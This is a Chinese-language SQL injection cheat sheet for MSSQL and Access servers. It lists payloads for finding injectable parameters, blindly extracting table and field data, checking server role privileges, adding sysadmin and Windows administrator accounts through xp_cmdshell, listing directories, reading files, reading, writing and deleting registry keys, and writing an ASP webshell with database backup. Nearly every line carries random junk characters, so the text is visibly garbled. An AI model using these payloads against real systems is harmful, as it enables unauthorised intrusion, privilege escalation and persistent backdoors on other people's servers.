1.判断是否有注入;and 1=1 ;and 1=2 T( U_
2.初步判断是否是mssql ;and user>0 5fd]v<
t:'Mh9h7u
3.注入参数是字符'and [查询条件] and ''=' wY[+ZT
NU5.o$
4.搜索时没过滤参数的'and [查询条件] and '%25'=' OG>}M$Ora
,,q10iF
5.判断数据库系统 9-fLz?J
&7K?w~
;and (select count(*) from sysobjects)>0 mssql cWe"%I
KV0]m^@x
;and (select count(*) from msysobjects)>0 access
2*^j
xD~5UER
YwjKAyLU
J^Wa8Q;9lX
6.猜数据库 ;and (select Count(*) from [数据库名])>0 [J?aD`{#O
F^];U+J
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 kY-N>E:
Z/Dx,zIR
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ;'#8tGv=
<^5Z:n!q
9.(1)猜字段的ascii值(access) t*1fLumXR
7`DBS^O]dG
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 $#9;)8J
.uMn0PE
(2)猜字段的ascii值(mssql) ] Zy5%gI
"hH.#5j
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 3sy (vC
;;6uw\6
O
10.测试权限结构(mssql) V{/?FO?E
a%/9v"}
s@K4u^$A
.$+#1-
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 61k"p2?+
0=2@
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- b*c*r dTx
*zbNd:i9
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- |B.Y6L6l
5K>3My#
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ~j}cyHg
5m&9"T. w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- `ZyI!"
/
F4z g3
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- keL&b/@
!>..Q)z
;and 1=(select IS_MEMBER('db_owner'));-- @tNz Q8
R;uvkg[o
FKDk +ojw
FWrX3i
11.添加mssql和系统的帐户 hK L4cpK4
f!Y?S
;exec master.dbo.sp_addlogin username;-- 5YE'L.
;exec master.dbo.sp_password null,username,password;-- DgId_\Ze
R3gdLa.
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Ezc?#<+7
e>+i>/Fn{h
;exec master.dbo.xp_cmdshell 'net user username password 3no%E03p
`T@i. 'X
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Lt?lv2k=L
Y']\Jq{OS
;exec master.dbo.xp_cmdshell 'net user username password /add';-- E7j(QOf
tkeoNuAM
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ZxGJzakB5$
}YGV\Nu
B~MU^|v
&^ 1$^=
12.(1)遍历目录 +"
.X
)avF
!Xf5e*1IS
;create table dirs(paths varchar(100), id int) `u3EU*~W
BC&S> #\
;insert dirs exec master.dbo.xp_dirtree 'c:\' N{9v1`B
*2pt%eav
;and (select top 1 paths from dirs)>0 Gp?a(-K5
[B\h$IcRv
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) xHvZV<#
B+P(M!m3
4gI/!,J(b
jS]ru-5.
(2)遍历目录 +%yfcyZ.
x kx^%3dV
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 81? hY4
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 +h|`/ &,
%(3|R@G.
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 DE}K~}sbd
+\d56j+D
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 t<.)Z-Ii
Aza /6OL
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 dk[!V1x4\
yj 3cyLXw
5d Eh7XL
SYAyk
13.mssql中的存储过程 [kVS
O
a!6{:8Zi0
xp_regenumvalues 注册表根键, 子键 deBY5|
q/4J.jL
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 9UdM`v)(
rK' L6o
xp_regread 根键,子键,键值名 EH+"~-v)ae
u^@f&BIG]:
;exec xp_regread }eCw6
H%qsjB^
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 1gL2ia
b|l:fT?&
xp_regwrite 根键,子键, 值名, 值类型, 值 j/323Za+
`uv2H$
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 W#9BNKL
tU }h~&M
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 @K &GJ
B3pCy~*5
xp_regdeletevalue 根键,子键,值名 o |{5M|nD
\tf<B\oa
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !`Fxa4i>
Ec3}_`
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 D=q:*x
l:
HTk4$0
h]IxXP?h[
sXLq*b?
14.mssql的backup创建webshell ^bGNq
X
LM:vsG
use model BRw .]&/
y`<*U;xL
create table cmd(str image); .5^cb%B*
^n*)7K[
insert into cmd(str) values (''); e(]!GA
ePOG}k($/%
backup database model to disk='c:\l.asp'; ],@rS9K
C)[,4wt,
@E&J_un
NW~N}5T
15.mssql内置函数 so,t
,`'Qi%O
;and (select @@version)>0 获得Windows的版本号 @6Y?\Wx$w
v [wb~uw\
;and user_name()='dbo' 判断当前系统的连接用户是不是sa :}He\V
9P1OP Xv*p
;and (select user_name())>0 爆当前系统的连接用户 (!ux+K
)tC5Hijq,
;and (select db_name())>0 得到当前连接的数据库 8}I$'x
LdYB7T,
v> LIvi|]
h9t$Uz^N
16.简洁的webshell MU`1LHg
0at/c-K`
use model R6` WN
iOd&BB6
create table cmd(str image); <wk!hTmW
qmkAg }2
insert into cmd(str) values (''); HZ aV7dOZ8
_F6OM5F"N
backup database model to disk='g:\wwwtest\l.asp';